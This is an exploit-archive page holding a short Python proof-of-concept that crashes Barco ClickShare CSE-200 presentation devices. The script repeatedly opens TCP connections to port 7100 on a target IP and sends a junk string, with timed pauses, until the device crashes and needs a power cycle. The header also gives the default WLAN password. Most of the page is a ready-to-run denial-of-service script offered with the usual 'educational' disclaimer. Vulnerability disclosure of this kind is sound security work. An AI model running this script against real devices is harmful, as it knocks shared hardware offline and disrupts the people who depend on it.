Barco ClickShare CSE-200 Remote Denial of Service

2018.04.17
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service # Date: 11-04-2018 # Hardware Link: https://www.barco.com/de/product/clickshare-cse-200 # Exploit Author: Florian Hauser # Contact: florian DOT g DOT hauser AT gmail DOT com # CVE: requested by Barco # Category: Hardware # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Florian Hauser is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Florian Hauser's # responsibility. # # Use them at your own risk! ################ # Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'): # Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <- # not only disconnects all clients but also results in a crash of this hardware device # Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018. # I got permission from Barco to disclose this vulnerability. # This affects potentially all other ClickShare products, Barco confirms import socket import sys from time import sleep if len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) # Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that. # 6-7 requests do the job usually for x in range(1,50): #Create a new socket each time because otherwise the service drops the socket #Same request cannot be sent several times in sequence s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Connect to vulnerable TCP port 7100 connect=s.connect((str(sys.argv[1]), 7100)) s.send('some evil string \r\n\n') print "Buffer " + str(x) + " sent...\n" result=s.recv(1024) print result s.close() #Sleep for a few seconds because otherwise the service denies a socket creation but does not crash sleep(7)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top